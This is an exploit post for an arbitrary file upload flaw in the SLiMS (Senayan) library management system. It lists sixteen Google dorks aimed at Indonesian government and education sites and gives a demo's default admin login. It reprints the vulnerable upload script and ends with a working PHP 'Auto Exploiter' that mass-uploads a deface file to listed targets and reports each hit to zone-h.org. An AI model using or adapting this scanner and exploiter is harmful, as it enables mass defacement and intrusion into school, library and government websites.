· 7 years ago · Feb 13, 2019, 10:10 PM
1########################################################################
2
3# Exploit Title : Slims CMS Senayan Library Management System 7.0 Arbitrary File Upload
4# Author [ Discovered By ] : KingSkrupellos
5# Team : Cyberizm Digital Security Team
6# Date : 13/02/2019
7# Vendor Homepage : slims.web.id
8# Software Download Link : github.com/slims/
9github.com/slims/slims8_akasia/archive/master.zip
10github.com/slims/slims7_cendana/archive/master.zip
11github.com/slims/s3st15_matoa/archive/master.zip
12github.com/slims/slims5_meranti/archive/master.zip
13github.com/slims/s3st14/archive/master.zip
14# Software Information Link : slims.web.id/web/ * slims.web.id/goslims/
15# Software Affected Version : 5/6/7 and previous versions
16# Tested on : Windows / Linux
17# Exploit Risk : High
18# CXSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018050260
19
20########################################################################
21
22Slims CMS Senayan OpenSource Library Management System
23The Winner in the Category of OSS Indonesia ICT Award 2009
24Arbitrary File Upload Vulnerability and Auto Exploiter
25
26########################################################################
27
28# Description About Software :
29****************************
30
31Description : SLiMS (Senayan Library Management System) is a free and open source Library Management System. It is build on free and
32open source technology like PHP and MySQL. SLiMS provides many features such as bibliography database,
33circulation, membership management and many more that will help "automating" library tasks.
34
35Features : Online Public Access Catalog (OPAC) with thumbnail document image support (can be use for book cover), Simple Search
36and Advanced Search mode Digital contents/files (PDF, DOC, RTF, XLS, PPT, Video, Audio, etc.)
37attachment in each bibliographic record support Documents record detail in MODS (Metadata Object Description Schema)
38XML format RSS (Really Simple Syndication) XML format for OPAC - OAI-PMH (Open Archives Initiative Protocol for Metadata Harvesting)
39in Dublin Core format for metadata harvesting purpose - Bibliographic/catalog database management with book cover image support
40Serial publication control - Document items (book copies) management with barcode support -
41Master Files management to manages document referential data such - as GMD, Collection Types, Publishers, Authors, Locations, Authors and Suppliers
42Circulation support with following sub-features : Loan and Return transaction - Collections reservation
43Quick return - Configurable and flexible Loan Rules - Membership management - Stock Taking module to help Stock Op name process in library
44Reporting and Statistics - System modules with following sub-features : - Global system configuration - Modules management
45Application Users and Groups management - Holiday settings - Barcodes generator utility - Database backup utility
46Responsive user interface - 3rd party bibliographic records indexing support with Sphinx Search and MongoDB
47
48########################################################################
49
50#Google Dork 1 : intext:''The Winner in the Category of OSS Indonesia ICT Award 2009''
51
52#Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id
53
54#Google Dork 3 : inurl:''/slims5-meranti/'' site:id
55
56#Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009''
57
58#Google Dork 5 : Powered by SLiMS site:id
59
60#Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii
61
62#Google Dork 7 : Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan.
63
64#Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog.
65
66#Google Dork 9 : SLiMS (Senayan Library Management System) is an open source Library Management System.
67 It is build on Open source technology like PHP and MySQL.
68
69#Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly
70This software and this template are released Under GNU GPL License Version 3
71
72#Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id
73
74#Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog
75
76#Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library.
77
78#Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue)
79
80#Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id
81
82#Google Dork 16 : Senayan | Open Source Library Management System :: OPAC
83
84########################################################################
85
86Demo Version : softaculous.com/softaculous/demos/SLiMS
87
88Admin Username: admin
89Admin Password: pass
90
91########################################################################
92
93# Vulnerable Source Code :
94*************************
95<?php
96/**
97 * Copyright (C) 2007,2008 Arie Nugraha (dicarve@yahoo.com)
98 *
99 * This program is free software; you can redistribute it and/or modify
100 * it under the terms of the GNU General Public License as published by
101 * the Free Software Foundation; either version 3 of the License, or
102 * (at your option) any later version.
103 *
104 * This program is distributed in the hope that it will be useful,
105 * but WITHOUT ANY WARRANTY; without even the implied warranty of
106 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
107 * GNU General Public License for more details.
108 *
109 * You should have received a copy of the GNU General Public License
110 * along with this program; if not, write to the Free Software
111 * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
112 *
113 */
114/* Biblio file Adding Pop Windows */
115// key to authenticate
116define('INDEX_AUTH', '1');
117// key to get full database access
118define('DB_ACCESS', 'fa');
119// main system configuration
120require '../../../sysconfig.inc.php';
121// IP based access limitation
122require LIB_DIR.'ip_based_access.inc.php';
123do_checkIP('smc');
124do_checkIP('smc-bibliography');
125// start the session
126require SENAYAN_BASE_DIR.'admin/default/session.inc.php';
127require SENAYAN_BASE_DIR.'admin/default/session_check.inc.php';
128require SIMBIO_BASE_DIR.'simbio_GUI/table/simbio_table.inc.php';
129require SIMBIO_BASE_DIR.'simbio_GUI/form_maker/simbio_form_table.inc.php';
130require SIMBIO_BASE_DIR.'simbio_DB/simbio_dbop.inc.php';
131require SIMBIO_BASE_DIR.'simbio_FILE/simbio_file_upload.inc.php';
132require SIMBIO_BASE_DIR.'simbio_FILE/simbio_directory.inc.php';
133// privileges checking
134$can_write = utility::havePrivilege('bibliography', 'w');
135if (!$can_write) {
136 die('<div class="errorBox">'.__('You are not authorized to view this section').'</div>');
137}
138// page title
139$page_title = 'File Attachment Upload';
140// check for biblio ID in url
141$biblioID = 0;
142if (isset($_GET['biblioID']) AND $_GET['biblioID']) {
143 $biblioID = (integer)$_GET['biblioID'];
144}
145// check for file ID in url
146$fileID = 0;
147if (isset($_GET['fileID']) AND $_GET['fileID']) {
148 $fileID = (integer)$_GET['fileID'];
149}
150// start the output buffer
151ob_start();
152/* main content */
153// biblio topic save proccess
154if (isset($_POST['upload']) AND trim(strip_tags($_POST['fileTitle'])) != '') {
155 $uploaded_file_id = 0;
156 $title = trim(strip_tags($_POST['fileTitle']));
157 $url = trim(strip_tags($_POST['fileURL']));
158 // create new sql op object
159 $sql_op = new simbio_dbop($dbs);
160 // FILE UPLOADING
161 if (isset($_FILES['file2attach']) AND $_FILES['file2attach']['size']) {
162 // create upload object
163 $file_dir = trim($_POST['fileDir']);
164 $file_upload = new simbio_file_upload();
165 $file_upload->setAllowableFormat($sysconf['allowed_file_att']);
166 $file_upload->setMaxSize($sysconf['max_upload']*1024);
167 $file_upload->setUploadDir(REPO_BASE_DIR.DIRECTORY_SEPARATOR.str_replace('/', DIRECTORY_SEPARATOR, $file_dir));
168 $file_upload_status = $file_upload->doUpload('file2attach');
169 if ($file_upload_status === UPLOAD_SUCCESS) {
170 $file_ext = substr($file_upload->new_filename, strrpos($file_upload->new_filename, '.')+1);
171 $fdata['uploader_id'] = $_SESSION['uid'];
172 $fdata['file_title'] = $dbs->escape_string($title);
173 $fdata['file_name'] = $dbs->escape_string($file_upload->new_filename);
174 $fdata['file_url'] = $dbs->escape_string($url);
175 $fdata['file_dir'] = $dbs->escape_string($file_dir);
176 $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc'])));
177 $fdata['mime_type'] = $sysconf['mimetype'][$file_ext];
178 $fdata['input_date'] = date('Y-m-d H:i:s');
179 $fdata['last_update'] = $fdata['input_date'];
180 // insert file data to database
181 @$sql_op->insert('files', $fdata);
182 $uploaded_file_id = $sql_op->insert_id;
183 utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' upload file ('.$file_upload->new_filename.')');
184 } else {
185 echo '<script type="text/javascript">';
186 echo 'alert(\''.__('Upload FAILED! Forbidden file type or file size too big!').'\');';
187 echo 'self.close();';
188 echo '</script>';
189 die();
190 }
191 } else {
192 if ($url && preg_match('@^(http|https|ftp|gopher):\/\/@i', $url)) {
193 $fdata['uploader_id'] = $_SESSION['uid'];
194 $fdata['file_title'] = $dbs->escape_string($title);
195 $fdata['file_name'] = $dbs->escape_string($url);
196 $fdata['file_url'] = $dbs->escape_string($fdata['file_name']);
197 $fdata['file_dir'] = 'literal{NULL}';
198 $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc'])));
199 $fdata['mime_type'] = 'text/uri-list';
200 $fdata['input_date'] = date('Y-m-d H:i:s');
201 $fdata['last_update'] = $fdata['input_date'];
202 // insert file data to database
203 @$sql_op->insert('files', $fdata);
204 $uploaded_file_id = $sql_op->insert_id;
205 }
206 }
207 // BIBLIO FILE RELATION DATA UPDATE
208 // check if biblio_id POST var exists
209 if (isset($_POST['updateBiblioID']) AND !empty($_POST['updateBiblioID'])) {
210 $updateBiblioID = (integer)$_POST['updateBiblioID'];
211 $data['biblio_id'] = $updateBiblioID;
212 $data['file_id'] = $uploaded_file_id;
213 $data['access_type'] = trim($_POST['accessType']);
214 $data['access_limit'] = 'literal{NULL}';
215 // parsing member type data
216 if ($data['access_type'] == 'public') {
217 $groups = '';
218 if (isset($_POST['accLimit']) AND count($_POST['accLimit']) > 0) {
219 $groups = serialize($_POST['accLimit']);
220 } else {
221 $groups = 'literal{NULL}';
222 }
223 $data['access_limit'] = trim($groups);
224 }
225 if (isset($_POST['updateFileID'])) {
226 $fileID = (integer)$_POST['updateFileID'];
227 // file biblio access update
228 $update1 = $sql_op->update('biblio_attachment', array('access_type' => $data['access_type'], 'access_limit' => $data['access_limit']), 'biblio_id='.$updateBiblioID.' AND file_id='.$fileID);
229 // file description update
230 $update2 = $sql_op->update('files', array('file_title' => $title, 'file_url' => $url, 'file_desc' => $dbs->escape_string(trim($_POST['fileDesc']))), 'file_id='.$fileID);
231 if ($update1) {
232 echo '<script type="text/javascript">';
233 echo 'alert(\''.__('File Attachment data updated!').'\');';
234 echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$updateBiblioID.'\');';
235 echo '</script>';
236 } else {
237 utility::jsAlert(''.__('File Attachment data FAILED to update!').''."\n".$sql_op->error);
238 }
239 } else {
240 if ($sql_op->insert('biblio_attachment', $data)) {
241 echo '<script type="text/javascript">';
242 echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');';
243 echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$data['biblio_id'].'\');';
244 echo '</script>';
245 } else {
246 utility::jsAlert(''.__('File Attachment data FAILED to save!').''."\n".$sql_op->error);
247 }
248 }
249 utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' updating file attachment data');
250 } else {
251 if ($uploaded_file_id) {
252 // add to session array
253 $fdata['file_id'] = $uploaded_file_id;
254 $fdata['access_type'] = trim($_POST['accessType']);
255 $_SESSION['biblioAttach'][$uploaded_file_id] = $fdata;
256 echo '<script type="text/javascript">';
257 echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');';
258 echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php\');';
259 echo '</script>';
260 }
261 }
262}
263// create new instance
264$form = new simbio_form_table('mainForm', $_SERVER['PHP_SELF'].'?biblioID='.$biblioID, 'post');
265$form->submit_button_attr = 'name="upload" value="'.__('Upload Now').'" class="button"';
266// form table attributes
267$form->table_attr = 'align="center" id="dataList" cellpadding="5" cellspacing="0"';
268$form->table_header_attr = 'class="alterCell" style="font-weight: bold;"';
269$form->table_content_attr = 'class="alterCell2"';
270// query
271$file_attach_q = $dbs->query("SELECT fl.*, batt.* FROM files AS fl
272 LEFT JOIN biblio_attachment AS batt ON fl.file_id=batt.file_id
273 WHERE batt.biblio_id=$biblioID AND batt.file_id=$fileID");
274$file_attach_d = $file_attach_q->fetch_assoc();
275// edit mode
276if ($file_attach_d['biblio_id'] AND $file_attach_d['file_id']) {
277 $form->addHidden('updateBiblioID', $file_attach_d['biblio_id']);
278 $form->addHidden('updateFileID', $file_attach_d['file_id']);
279} else if ($biblioID) {
280 $form->addHidden('updateBiblioID', $biblioID);
281}
282// file title
283$form->addTextField('text', 'fileTitle', __('Title').'*', $file_attach_d['file_title'], 'style="width: 95%; overflow: auto;"');
284// file attachment
285if ($file_attach_d['file_name']) {
286 $form->addAnything('Attachment', $file_attach_d['file_dir'].'/'.$file_attach_d['file_name']);
287} else {
288 // file upload dir
289 // create simbio directory object
290 $repo = new simbio_directory(REPO_BASE_DIR);
291 $repo_dir_tree = $repo->getDirectoryTree(5);
292 $repodir_options[] = array('', __('Repository ROOT'));
293 if (is_array($repo_dir_tree)) {
294 // sort array by index
295 ksort($repo_dir_tree);
296 // loop array
297 foreach ($repo_dir_tree as $dir) {
298 $repodir_options[] = array($dir, $dir);
299 }
300 }
301 // add repo directory options to select list
302 $form->addSelectList('fileDir', __('Repo. Directory'), $repodir_options);
303 // file upload
304 $str_input = simbio_form_element::textField('file', 'file2attach');
305 $str_input .= ' Maximum '.$sysconf['max_upload'].' KB';
306 $form->addAnything(__('File To Attach'), $str_input);
307}
308// file url
309$form->addTextField('textarea', 'fileURL', __('URL'), $file_attach_d['file_url'], 'rows="1" style="width: 100%; overflow: auto;"');
310// file description
311$form->addTextField('textarea', 'fileDesc', __('Description'), $file_attach_d['file_desc'], 'rows="2" style="width: 100%; overflow: auto;"');
312// file access
313$acctype_options[] = array('public', __('Public'));
314$acctype_options[] = array('private', __('Private'));
315$form->addSelectList('accessType', __('Access'), $acctype_options, $file_attach_d['access_type']);
316// file access limit if set to public
317$group_query = $dbs->query('SELECT member_type_id, member_type_name FROM mst_member_type');
318$group_options = array();
319while ($group_data = $group_query->fetch_row()) {
320 $group_options[] = array($group_data[0], $group_data[1]);
321}
322$form->addCheckBox('accLimit', __('Access Limit by Member Type'), $group_options, !empty($file_attach_d['access_limit'])?unserialize($file_attach_d['access_limit']):null );
323// print out the object
324echo $form->printOut();
325/* main content end */
326$content = ob_get_clean();
327// include the page template
328require SENAYAN_BASE_DIR.'/admin/'.$sysconf['admin_template']['dir'].'/notemplate_page_tpl.php';
329
330########################################################################
331
332# Exploit Code :
333***************
334/admin/modules/bibliography/pop_attach.php
335
336Note : You can use Auto Exploiter PHP Code.
337
338# Directory File Path :
339*********************
340/repository/....
341
342# Note : Fill the form and choose your file and upload it.
343
344# Allowed File Extensions : txt jpg gif png
345
346#Indonesian Government / Education Sites are vulnerable for this issue.
347
348#Attackers can exploit this issue via a browser or with Auto PHP Exploiter tool.
349
350########################################################################
351
352#Auto Exploiter PHP Code =>
353******************************
354
355<?php
356/*
357# KingSkrupellos from Cyberizm Digital Security Team
358# Our Security Forum : cyberizm.org
359# Twitter : twitter.com/kngskrplls
360
361# your list.txt must a single directory with this exploiter #
362
363###############################################
364
365# This Exploit and Vulnerability was discovered by KingSkrupellos
366# Thanks for All Moslem Hackers and Cyberizm Digital Security Team
367# This Exploiter may sometimes couldn't work %100 because sometimes the bot don't understand the command.
368# If the command don't understand the command, please exploit it manually.
369
370# Special thanks : All Moslem Hackers and Cyberizm Digital Security Team
371
372#################################################
373# note : Please do not remove Cyberizm copyright.
374
375
376# This Exploit Coded By KingSkrupellos from Cyberizm Digital Security Team
377*/
378echo "
379
380 File Attachment Auto Exploiter - coded by KingSkrupellos
381
382 $ Thanks for All Moslem Hackers and Cyberizm Digital Security Team
383
384";
385echo "Input your target list: ";
386$list = trim(fgets(STDIN));
387
388$shell = "yourdefacefilename.txt";
389$nickzoneh = "KingSkrupellos";
390$exploit = "/admin/modules/bibliography/pop_attach.php";
391$path = "/repository/";
392
393$open = fopen("$list","r");
394$size = filesize("$list");
395$read = fread($open,$size);
396$lists = explode("\r\n",$read);
397
398echo "\n";
399
400foreach($lists as $target){
401 if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){
402 $targets = "http://$target";
403 }else{
404 $targets = $target;
405 }
406
407 echo "Target => $targets\n";
408 echo " [*] Checking Path : ";
409
410 $cd = curl_init("$targets$exploit");
411 curl_setopt($cd, CURLOPT_FOLLOWLOCATION, 1);
412 curl_setopt($cd, CURLOPT_RETURNTRANSFER, 1);
413 curl_exec($cd);
414 $httpcode = curl_getinfo($cd, CURLINFO_HTTP_CODE);
415 curl_close($cd);
416
417 if($httpcode == 200){
418 echo "200 OK\n";
419 echo " [*] Uploading shell : ";
420 $ch = curl_init();
421 curl_setopt($ch, CURLOPT_URL, "$targets/$exploit");
422 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
423 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
424 curl_setopt($ch, CURLOPT_POST, 1);
425 curl_setopt($ch, CURLOPT_POSTFIELDS, array("fileTitle"=>"CyBeRiZM" , "file2attach"=>"@$shell" , "upload"=>"Unggah Sekarang"));
426 curl_exec($ch);
427
428 $cek = curl_init();
429 curl_setopt($cek, CURLOPT_URL, "$targets$path$shell");
430 curl_setopt($cek, CURLOPT_FOLLOWLOCATION, 1);
431 curl_setopt($cek, CURLOPT_RETURNTRANSFER, 1);
432 $ceek = curl_exec($cek);
433 $ceeks = curl_getinfo($cek, CURLINFO_HTTP_CODE);
434
435 if(preg_match("/hacked/",$ceek) or $ceeks == 200){
436 echo "OK $targets$path$shell\n";
437 echo " [*] Zone-H : ";
438 $zh = curl_init("http://zone-h.org/notify/single");
439 curl_setopt($zh, CURLOPT_FOLLOWLOCATION, 1);
440 curl_setopt($zh, CURLOPT_RETURNTRANSFER, 1);
441 curl_setopt($zh, CURLOPT_POST, 1);
442 curl_setopt($zh, CURLOPT_POSTFIELDS, array("defacer"=>"$nickzoneh","domain1"=>"$targets$path$shell","hackmode"=>"18","reason"=>"5"));
443
444 $postzh = curl_exec($zh);
445 if(preg_match("/color=\"red\">OK<\/font><\/li>/i",$postzh)){
446 echo "OK\n\n";
447 }else{
448 echo "NO\n\n";
449 }
450 }else{
451 echo "Failed\n\n";
452 }
453 }else{
454 echo "Not Vulnerable\n\n";
455 }
456}
457
458##############################################################################################################
459
460# Discovered By Hacker KingSkrupellos from Cyberizm Digital Security Technological Turkish Moslem Army
461
462##############################################################################################################